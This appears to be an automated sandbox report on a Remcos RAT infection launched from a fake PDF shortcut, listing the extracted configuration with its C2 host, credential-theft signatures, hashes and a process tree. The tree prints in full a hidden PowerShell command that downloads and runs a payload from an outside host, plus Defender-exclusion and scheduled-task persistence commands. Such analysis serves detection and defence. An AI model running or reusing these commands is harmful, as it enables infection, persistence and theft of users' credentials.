Overview

overview

10

Static

static

1

HBL10909LI...DF.lnk

windows7-x64

8

HBL10909LI...DF.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/09/2024, 14:47

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF/HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF.lnk

  • Size

    2KB

  • MD5

    b3173ef1cf4572a76e159dc513e3fc31

  • SHA1

    dbb727b41a95e6976afb742741af16952467af00

  • SHA256

    82277e734f339a7fce08aac2b342fae94e20f3349a568b839d39ccd3a81cc215

  • SHA512

    3e479a063085634ccce4bd04645c16c61ef357f44a97a71be95abbed4e30eca27fe661e302e04f9d699dcf7454f6ee0b15304f02e49f7ad8d815db65b64f8909

Score
10/10
remcossept 03 2024collectioncredential_accessdiscoveryexecutionratspywarestealer

Malware Config

Extracted

Family

remcos

Botnet

Sept 03 2024

C2

salonirang.duckdns.org:54604

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    bookmark

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    Rmc-SPKD1X

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Powershell Invoke Web Request.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 6 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF\HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3192
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "Invoke-WebRequest -Uri "http://tradimex.cc/eDVkOEaO/KD20240829230014246600006B6BA327.pdf" -OutFile "$env:TEMP\spoof.pdf"; Start-Process "$env:TEMP\spoof.pdf"; Start-Sleep -Seconds 20; Invoke-WebRequest -Uri "http://tradimex.cc/DgjopIWH/TJgGO5EprAaBIME.pif" -OutFile "$env:TEMP\target.pif"; Start-Process "$env:TEMP\target.pif""
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3516
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\spoof.pdf"
        3⤵
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Modifies Internet Explorer settings
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4272
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3000
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=BD11BA8516E1C7FCE3AC8673C506150D --mojo-platform-channel-handle=1744 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2492
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=128A5A7E78E9A78BDFBFFE5AD772AD08 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=128A5A7E78E9A78BDFBFFE5AD772AD08 --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:1
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4080
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=96EBB3A041CB73671FCB88BD725E99C1 --mojo-platform-channel-handle=2312 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3512
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A89FA22F222E27E7601763CAA8C0A9EE --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A89FA22F222E27E7601763CAA8C0A9EE --renderer-client-id=5 --mojo-platform-channel-handle=2336 --allow-no-sandbox-job /prefetch:1
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2532
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=984C8C550317E0370942A8050A3C11ED --mojo-platform-channel-handle=1940 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4604
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0723A07BD501DA5464F274C350D8B283 --mojo-platform-channel-handle=2320 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2164
      • C:\Users\Admin\AppData\Local\Temp\target.pif
        "C:\Users\Admin\AppData\Local\Temp\target.pif"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1984
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\target.pif"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2676
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gVmBHRfidrI.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4256
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gVmBHRfidrI" /XML "C:\Users\Admin\AppData\Local\Temp\tmp6A2F.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2356
        • C:\Users\Admin\AppData\Local\Temp\target.pif
          "C:\Users\Admin\AppData\Local\Temp\target.pif"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of SetWindowsHookEx
          PID:3144
          • C:\Users\Admin\AppData\Local\Temp\target.pif
            C:\Users\Admin\AppData\Local\Temp\target.pif /stext "C:\Users\Admin\AppData\Local\Temp\okkvanfphfdozrnhmfmyobdwgaraitp"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1364
          • C:\Users\Admin\AppData\Local\Temp\target.pif
            C:\Users\Admin\AppData\Local\Temp\target.pif /stext "C:\Users\Admin\AppData\Local\Temp\zepobfqjvnvbjgbldphszgxnpgijjeguwa"
            5⤵
            • Executes dropped EXE
            PID:4604
          • C:\Users\Admin\AppData\Local\Temp\target.pif
            C:\Users\Admin\AppData\Local\Temp\target.pif /stext "C:\Users\Admin\AppData\Local\Temp\zepobfqjvnvbjgbldphszgxnpgijjeguwa"
            5⤵
            • Executes dropped EXE
            • Accesses Microsoft Outlook accounts
            • System Location Discovery: System Language Discovery
            PID:1192
          • C:\Users\Admin\AppData\Local\Temp\target.pif
            C:\Users\Admin\AppData\Local\Temp\target.pif /stext "C:\Users\Admin\AppData\Local\Temp\bhcyuyb"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:856
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
      PID:3656

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
      Filesize

      64KB

      MD5

      6e02153c40db946863f68da79a546cf0

      SHA1

      5f6d8addcece015606692a850e3b3df85ba61e2e

      SHA256

      9ba07ea4509a8457eaf80bd6e056e3a4b17c7c6c16578092b8f2aad8a67e0d83

      SHA512

      d3f5819b3aae0dee72cafa706c9c9e072ee9736a57332fc2a4faef5eb441578ca4254cb73d679f62d04eb1b12b4640826d51847e9c0e9a362ad4ceb4420c1ed7

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
      Filesize

      36KB

      MD5

      b30d3becc8731792523d599d949e63f5

      SHA1

      19350257e42d7aee17fb3bf139a9d3adb330fad4

      SHA256

      b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

      SHA512

      523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
      Filesize

      56KB

      MD5

      752a1f26b18748311b691c7d8fc20633

      SHA1

      c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

      SHA256

      111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

      SHA512

      a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      968cb9309758126772781b83adb8a28f

      SHA1

      8da30e71accf186b2ba11da1797cf67f8f78b47c

      SHA256

      92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

      SHA512

      4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      33e9dd1bc41e70c4fbdf04b85cf36ff4

      SHA1

      0433625fae735abc2f11249456e212dfca1473a9

      SHA256

      f11191abae782730f3e16400aef46c9e8404c2608dc132ec646b41e7f07911f9

      SHA512

      d74083d2f0e7fe21db55c7c0bc880dd2d1fe92ca806c79f77ec0bbc7d2ae5fd1d3509d2ebd0fa60efbab0688711902b7a1da6419aba94a0897810ccf6d9957df

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      18KB

      MD5

      1025bf561fba83ffcf512af40dd568e6

      SHA1

      7ecdf831570812ada91a4f4fb70c6cfa0592a6f2

      SHA256

      adcb4304f7b74ac2a46fab7574a791a97e9897216eb4609b1c43842918dd4857

      SHA512

      ee78be80c229ea5a03f80ff3ac94d70e8551e3c8797e6dd1dea8a26fcd945edfe7b14fe9fd7bac7ba55ed016d78c4b06dadae40298b116f283b22d38b620f03c

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ybboly5j.rkk.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\okkvanfphfdozrnhmfmyobdwgaraitp
      Filesize

      4KB

      MD5

      2538ec9e8425a905937573069b77d4c2

      SHA1

      ad0c2b7aff4382e23444d26adac96d9697b849f3

      SHA256

      29338949fae4c88a972837aae898529e4c7a2c4df35982eef2f8d7b602c17f4e

      SHA512

      a867a471b837b9c662528ee7a5904e8fe7b1eebb277b8a7fe4d4caf423fae914baf692bb5004c02ddb539b157d63326178467e28b03aa92a533cda19155d501c

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\spoof.pdf
      Filesize

      832KB

      MD5

      24961fcde4d360d324f73c465a451ca6

      SHA1

      1988741b844c4f3cafd9d3c9505ea2c35c36db75

      SHA256

      f141c8b55ef363b72d0fdba9f8e67af281a09861cb58dbcbdfff516f2d9cb0d0

      SHA512

      b2de11c3716259fc886b310763d04ef7563717dda4964fa66f89dd4a690655247aa8643d1dbd93a6ea500de017b55f68743df9aa55378a7a213b04f52795bc9a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\target.pif
      Filesize

      908KB

      MD5

      b2125f1650b58eddaa86b18ed64871a5

      SHA1

      d28fd63324a74b0c61a29e964f863bf79668f9a6

      SHA256

      717ba8a5452f784b6c8df7936a0c4668720cf0ad480b9dfab9028056d398a466

      SHA512

      f8620026e270376e561da0d5a2f458b10476db82c426bc8261dfeb66f3d3d2f9ff5d96abd69b712d492ae878b0f2f69da0bf836bed59bc23818062f83b9e7c85

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\tmp6A2F.tmp
      Filesize

      1KB

      MD5

      5fde7886012461340efaeb1fe0722e66

      SHA1

      6b545cf847a4e8e259a9a6c007b8f93619b768cf

      SHA256

      fb6e2cb10ef191c9ee8922b9158939044a2f6c12aa79b10bf4ac4e4a79a39096

      SHA512

      52b3b13ec9a9e720677f24c01fdffb5a568cb05118a8183e937496416adc6fe5c001ebfc043724ce062284c20c091a1f5422f8a4c5b8ddc0457f9c0fbc2877c7

      Download Submit

    • C:\Users\Admin\AppData\Roaming\bookmark\logs.dat
      Filesize

      184B

      MD5

      e90120faaa849696cb18d57cedc0a9ae

      SHA1

      2042db67f11729e8103b4816722ccad54d286ec1

      SHA256

      1da3498d37849a470f18e388eb79cfb42526bd433a274a69396e1bd79e6a5aba

      SHA512

      1b257dce7b5ece22779323b6b60fd91243f94f64a55fb9654a3393ddfe950dff36e34a6a84785db29bdf7cb116abe5d298d9646c5109e15453410c40b9b60f3e

      Download Submit

    • memory/856-263-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/856-256-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/856-260-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/1192-257-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download

    • memory/1192-251-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download

    • memory/1192-255-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download

    • memory/1364-252-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/1364-248-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/1364-254-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/1984-154-0x0000000004CC0000-0x0000000004CCA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/1984-157-0x0000000008F90000-0x000000000902C000-memory.dmp

      Filesize

      624KB

      Download

    • memory/1984-156-0x0000000006930000-0x00000000069F2000-memory.dmp

      Filesize

      776KB

      Download

    • memory/1984-155-0x0000000005150000-0x0000000005160000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1984-151-0x0000000000190000-0x000000000027A000-memory.dmp

      Filesize

      936KB

      Download

    • memory/1984-153-0x0000000004B10000-0x0000000004BA2000-memory.dmp

      Filesize

      584KB

      Download

    • memory/1984-152-0x0000000005180000-0x0000000005724000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/2676-162-0x0000000002A90000-0x0000000002AC6000-memory.dmp

      Filesize

      216KB

      Download

    • memory/2676-197-0x0000000006310000-0x000000000632E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/2676-163-0x00000000054A0000-0x0000000005AC8000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/2676-224-0x00000000076D0000-0x00000000076DA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/2676-211-0x0000000065040000-0x000000006508C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/2676-198-0x00000000063C0000-0x000000000640C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/3144-269-0x0000000010000000-0x0000000010019000-memory.dmp

      Filesize

      100KB

      Download

    • memory/3144-266-0x0000000010000000-0x0000000010019000-memory.dmp

      Filesize

      100KB

      Download

    • memory/3144-285-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/3144-171-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/3144-284-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/3144-277-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/3144-276-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/3144-271-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/3144-195-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/3144-243-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/3144-270-0x0000000010000000-0x0000000010019000-memory.dmp

      Filesize

      100KB

      Download

    • memory/3144-292-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/3144-170-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/3144-293-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/3144-168-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/3144-231-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/3144-232-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/3144-174-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/3144-246-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/3144-238-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/3144-239-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

